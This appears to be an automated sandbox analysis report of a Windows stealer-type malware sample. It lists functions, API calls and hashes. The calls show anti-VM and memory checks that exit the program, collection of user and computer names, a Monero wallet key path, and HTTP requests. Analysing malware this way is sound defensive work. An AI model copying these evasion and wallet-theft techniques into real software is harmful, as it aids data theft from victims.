                                      • Instruction ID: 37040e70d675297e715b5e24e6959cdd4e790347a8ecd1a4c6968e3f4886732a
                                      • Opcode Fuzzy Hash: d14a4acc3a4ec6a6dbae91569ec76176c24afff4a59980951be26a87b229b408
                                      • Instruction Fuzzy Hash: F612F872950528ABEB15EB98DDA2FEEB379EF14300F104199B10662491EF746F48CF72
                                      Function 00D45760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1090 d45760-d457c7 call d45d20 call d4ab30 * 3 call d4aa50 * 4 1106 d457cc-d457d3 1090->1106 1107 d457d5-d45806 call d4ab30 call d4aab0 call d31590 call d45440 1106->1107 1108 d45827-d4589c call d4aa50 * 2 call d31590 call d45510 call d4abb0 call d4ab10 call d4ade0 StrCmpCA 1106->1108 1123 d4580b-d45822 call d4abb0 call d4ab10 1107->1123 1134 d458e3-d458f9 call d4ade0 StrCmpCA 1108->1134 1138 d4589e-d458de call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1108->1138 1123->1134 1139 d45a2c-d45a94 call d4abb0 call d4ab30 * 2 call d316b0 call d4ab10 * 4 call d31670 call d31550 1134->1139 1140 d458ff-d45906 1134->1140 1138->1134 1269 d45d13-d45d16 1139->1269 1142 d4590c-d45913 1140->1142 1143 d45a2a-d45aaf call d4ade0 StrCmpCA 1140->1143 1146 d45915-d45969 call d4ab30 call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1142->1146 1147 d4596e-d459e3 call d4aa50 * 2 call d31590 call d45510 call d4abb0 call d4ab10 call d4ade0 StrCmpCA 1142->1147 1162 d45ab5-d45abc 1143->1162 1163 d45be1-d45c49 call d4abb0 call d4ab30 * 2 call d316b0 call d4ab10 * 4 call d31670 call d31550 1143->1163 1146->1143 1147->1143 1245 d459e5-d45a25 call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1147->1245 1168 d45ac2-d45ac9 1162->1168 1169 d45bdf-d45c64 call d4ade0 StrCmpCA 1162->1169 1163->1269 1175 d45b23-d45b98 call d4aa50 * 2 call d31590 call d45510 call d4abb0 call d4ab10 call d4ade0 StrCmpCA 1168->1175 1176 d45acb-d45b1e call d4ab30 call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1168->1176 1198 d45c66-d45c71 Sleep 1169->1198 1199 d45c78-d45ce1 call d4abb0 call d4ab30 * 2 call d316b0 call d4ab10 * 4 call d31670 call d31550 1169->1199 1175->1169 1274 d45b9a-d45bda call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1175->1274 1176->1169 1198->1106 1199->1269 1245->1143 1274->1169
                                      APIs
                                        • Part of subcall function 00D4AB30: lstrlen.KERNEL32(00D34F55,?,?,00D34F55,00D50DDF), ref: 00D4AB3B
                                        • Part of subcall function 00D4AB30: lstrcpy.KERNEL32(00D50DDF,00000000), ref: 00D4AB95
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D458F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D459DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45AA7
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D45440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45478
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D45510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45568
                                        • Part of subcall function 00D45510: lstrlen.KERNEL32(00000000), ref: 00D4557F
                                        • Part of subcall function 00D45510: StrStrA.SHLWAPI(00000000,00000000), ref: 00D455B4
                                        • Part of subcall function 00D45510: lstrlen.KERNEL32(00000000), ref: 00D455D3
                                        • Part of subcall function 00D45510: lstrlen.KERNEL32(00000000), ref: 00D455FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00D45C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 9ca2e40a5648a211bead5dc471aa08ce62c3c0269046a5880313fc69f6342db4
                                      • Instruction ID: 07cdedf19e435854068542f0d9a5ae8ebd9d0fca5c4eb93a9863fb5756441d00
                                      • Opcode Fuzzy Hash: 9ca2e40a5648a211bead5dc471aa08ce62c3c0269046a5880313fc69f6342db4
                                      • Instruction Fuzzy Hash: 6FE14E729505049BDB14FBA4E9A3AFE733DEF54300F408568B54666086EF35AA0CCBB2
                                      Function 00D419F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 d419f0-d41a1d call d4ade0 StrCmpCA 1304 d41a27-d41a41 call d4ade0 1301->1304 1305 d41a1f-d41a21 ExitProcess 1301->1305 1309 d41a44-d41a48 1304->1309 1310 d41c12-d41c1d call d4ab10 1309->1310 1311 d41a4e-d41a61 1309->1311 1312 d41a67-d41a6a 1311->1312 1313 d41bee-d41c0d 1311->1313 1315 d41a71-d41a80 call d4ab30 1312->1315 1316 d41afd-d41b0e StrCmpCA 1312->1316 1317 d41b1f-d41b30 StrCmpCA 1312->1317 1318 d41bdf-d41be9 call d4ab30 1312->1318 1319 d41a99-d41aa8 call d4ab30 1312->1319 1320 d41a85-d41a94 call d4ab30 1312->1320 1321 d41bc0-d41bd1 StrCmpCA 1312->1321 1322 d41b41-d41b52 StrCmpCA 1312->1322 1323 d41ba1-d41bb2 StrCmpCA 1312->1323 1324 d41b82-d41b93 StrCmpCA 1312->1324 1325 d41b63-d41b74 StrCmpCA 1312->1325 1326 d41aad-d41abe StrCmpCA 1312->1326 1327 d41acf-d41ae0 StrCmpCA 1312->1327 1313->1309 1315->1313 1329 d41b10-d41b13 1316->1329 1330 d41b1a 1316->1330 1331 d41b32-d41b35 1317->1331 1332 d41b3c 1317->1332 1318->1313 1319->1313 1320->1313 1342 d41bd3-d41bd6 1321->1342 1343 d41bdd 1321->1343 1333 d41b54-d41b57 1322->1333 1334 d41b5e 1322->1334 1339 d41bb4-d41bb7 1323->1339 1340 d41bbe 1323->1340 1337 d41b95-d41b98 1324->1337 1338 d41b9f 1324->1338 1335 d41b76-d41b79 1325->1335 1336 d41b80 1325->1336 1348 d41ac0-d41ac3 1326->1348 1349 d41aca 1326->1349 1350 d41ae2-d41aec 1327->1350 1351 d41aee-d41af1 1327->1351 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 d41af8 1350->1352 1351->1352 1352->1313
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00D41A15
                                      • ExitProcess.KERNEL32 ref: 00D41A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: bbbc54510bb0d8e7b7b2689cd6d7a328276e49bf5203c78d62621241d082b14e
                                      • Instruction ID: d3a150d57f01dce378ea7bd96f82ef1d91b617ae31aa13824e18bb1d5e8b3647
                                      • Opcode Fuzzy Hash: bbbc54510bb0d8e7b7b2689cd6d7a328276e49bf5203c78d62621241d082b14e
                                      • Instruction Fuzzy Hash: 10515A78B04209EFDB14DFA4D955AAE7BB9FF44704F104049F842AB240E779E985CB72
                                      Function 00D46C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672218), ref: 00D49BF1
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672368), ref: 00D49C0A
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016723F8), ref: 00D49C22
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016723C8), ref: 00D49C3A
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016723E0), ref: 00D49C53
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016791C8), ref: 00D49C6B
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01665890), ref: 00D49C83
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01665790), ref: 00D49C9C
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016722D8), ref: 00D49CB4
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672440), ref: 00D49CCC
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672470), ref: 00D49CE5
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672338), ref: 00D49CFD
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016656B0), ref: 00D49D15
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672230), ref: 00D49D2E
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D311D0: ExitProcess.KERNEL32 ref: 00D31211
                                        • Part of subcall function 00D31160: GetSystemInfo.KERNEL32(?), ref: 00D3116A
                                        • Part of subcall function 00D31160: ExitProcess.KERNEL32 ref: 00D3117E
                                        • Part of subcall function 00D31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                                        • Part of subcall function 00D31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                                        • Part of subcall function 00D31110: ExitProcess.KERNEL32 ref: 00D31143
                                        • Part of subcall function 00D31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                                        • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31258
                                        • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31266
                                        • Part of subcall function 00D31220: ExitProcess.KERNEL32 ref: 00D31294
                                        • Part of subcall function 00D46A10: GetUserDefaultLangID.KERNEL32 ref: 00D46A14
                                        • Part of subcall function 00D31190: ExitProcess.KERNEL32 ref: 00D311C6
                                        • Part of subcall function 00D479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47A10
                                        • Part of subcall function 00D479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47A17
                                        • Part of subcall function 00D479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D47A2F
                                        • Part of subcall function 00D47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47AA0
                                        • Part of subcall function 00D47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00D47AA7
                                        • Part of subcall function 00D47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00D47ABF
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00D46D99
                                      • Sleep.KERNEL32(00001770), ref: 00D46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46DBA
                                      • ExitProcess.KERNEL32 ref: 00D46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 0a4407246a629936086d0615573b28459b641eaec91bf0edfa6034fb03ad9ec6
                                      • Instruction ID: 772c7f8b0480551dd93ab82658df9c931435ffd87c198b91d05edc0cd8a37d47
                                      • Opcode Fuzzy Hash: 0a4407246a629936086d0615573b28459b641eaec91bf0edfa6034fb03ad9ec6
                                      • Instruction Fuzzy Hash: B6310875A40208ABEB14FBF4D867BFE7779EF44340F100918F552A6186DF74AA058B72
                                      Function 00D31220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 d31220-d31247 call d48b40 GlobalMemoryStatusEx 1439 d31273-d3127a 1436->1439 1440 d31249-d31271 call d4dd30 * 2 1436->1440 1441 d31281-d31285 1439->1441 1440->1441 1443 d31287 1441->1443 1444 d3129a-d3129d 1441->1444 1446 d31292-d31294 ExitProcess 1443->1446 1447 d31289-d31290 1443->1447 1447->1444 1447->1446
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                                      • __aulldiv.LIBCMT ref: 00D31258
                                      • __aulldiv.LIBCMT ref: 00D31266
                                      • ExitProcess.KERNEL32 ref: 00D31294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: c1661ed60bc669478ebedc685ee1d2c44aca5ae46678e4ed5a1d1947ee1b4bf9
                                      • Instruction ID: a2e54ea99520475161e163802f534c105a0ff3ddee61397c02ed2664d33bc9df
                                      • Opcode Fuzzy Hash: c1661ed60bc669478ebedc685ee1d2c44aca5ae46678e4ed5a1d1947ee1b4bf9
                                      • Instruction Fuzzy Hash: DB011DB4D40309BBEB10EFE4CC4ABAEBBB8EB14705F248458E604B61C1D77855458779
                                      Function 00D46D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1450 d46d93 1451 d46daa 1450->1451 1453 d46dac-d46dc2 call d46bc0 call d45d60 CloseHandle ExitProcess 1451->1453 1454 d46d5a-d46d77 call d4ade0 OpenEventA 1451->1454 1459 d46d95-d46da4 CloseHandle Sleep 1454->1459 1460 d46d79-d46d91 call d4ade0 CreateEventA 1454->1460 1459->1451 1460->1453
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00D46D99
                                      • Sleep.KERNEL32(00001770), ref: 00D46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46DBA
                                      • ExitProcess.KERNEL32 ref: 00D46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 47c99f8e5346807c479be4750678243514e614ca5a29a4a8726479346c8f31a4
                                      • Instruction ID: 822b41eaf66d6d17ff83b8a9ab7b586b08a6b6c680c013980cb21f163688b5d1
                                      • Opcode Fuzzy Hash: 47c99f8e5346807c479be4750678243514e614ca5a29a4a8726479346c8f31a4
                                      • Instruction Fuzzy Hash: 65F05E70E44209ABEB11ABA0DC0ABBE3774EF05701F140515B593A51C5DBB9A900CB72
                                      Function 00D34800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: d2c0ffd98304f1cb4e3ec6ac90b8b77c791c7937d927e5f3674abdd18d9618b7
                                      • Instruction ID: 1722fe8a8adae25f81e26fabbaac0509884adc3bf0ce5f33bcb9bdb0b3878928
                                      • Opcode Fuzzy Hash: d2c0ffd98304f1cb4e3ec6ac90b8b77c791c7937d927e5f3674abdd18d9618b7
                                      • Instruction Fuzzy Hash: C2214F71D40208ABDF14DFA4E845ADE7B79FB44321F108625F955A72C0EB746A05CFA2
                                      Function 00D45440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D362D0: InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
                                        • Part of subcall function 00D362D0: StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36353
                                        • Part of subcall function 00D362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
                                        • Part of subcall function 00D362D0: HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
